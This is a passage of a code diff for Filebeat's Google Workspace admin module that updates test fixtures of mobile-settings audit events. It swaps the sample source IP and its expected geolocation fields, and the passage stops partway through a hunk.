+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ACTION_REQUESTED","parameters":[{"name":"ACTION_ID","value":"id"},{"name":"ACTION_TYPE","value":"ACCOUNT_WIPE"},{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"name"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICES_BULK_CREATION","parameters":[{"name":"NUMBER_OF_COMPANY_OWNED_DEVICES","intValue":10}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_BLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_DEVICE_DELETION","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_UNBLOCKED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"COMPANY_OWNED_DEVICE_WIPED","parameters":[{"name":"COMPANY_DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT","parameters":[{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"GROUP"},{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"NEW_PERMISSION_GRANT_STATE","value":"GRANTED"},{"name":"OLD_PERMISSION_GRANT_STATE","value":"DENIED"},{"name":"PERMISSION_GROUP_NAME","value":"LOCATION"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_APPLICATION_SETTINGS","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_APPLICATION_TO_WHITELIST","parameters":[{"name":"MOBILE_APP_PACKAGE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"DISTRIBUTION_ENTITY_NAME","value":"ANY"},{"name":"DISTRIBUTION_ENTITY_TYPE","value":"ORG_UNIT"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_DELETE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_ADMIN_RESTRICTIONS_PIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ADD_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_WIRELESS_NETWORK","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"CHANGE_MOBILE_WIRELESS_NETWORK_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_WIRELESS_NETWORK_NAME","value":"network"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"REMOVE_MOBILE_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"MOBILE_CERTIFICATE_COMMON_NAME","value":"cert"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"ENROLL_FOR_GOOGLE_DEVICE_MANAGEMENT"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_ACCOUNT_WIPE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"MOBILE_SETTINGS","name":"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json
index 80c0d6dc9e27..e03554502e54 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-mobile-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_CANCELLED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -28,24 +28,20 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -69,7 +65,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ACTION_REQUESTED\",\"parameters\":[{\"name\":\"ACTION_ID\",\"value\":\"id\"},{\"name\":\"ACTION_TYPE\",\"value\":\"ACCOUNT_WIPE\"},{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -86,27 +82,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 534,
+        "log.offset": 533,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -130,7 +122,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"MOBILE_CERTIFICATE_COMMON_NAME\",\"value\":\"name\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -144,26 +136,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1068,
+        "log.offset": 1066,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -184,7 +172,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICES_BULK_CREATION\",\"parameters\":[{\"name\":\"NUMBER_OF_COMPANY_OWNED_DEVICES\",\"intValue\":10}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -196,26 +184,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1548,
+        "log.offset": 1545,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -236,7 +220,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_BLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -249,26 +233,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1951,
+        "log.offset": 1947,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -289,7 +269,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
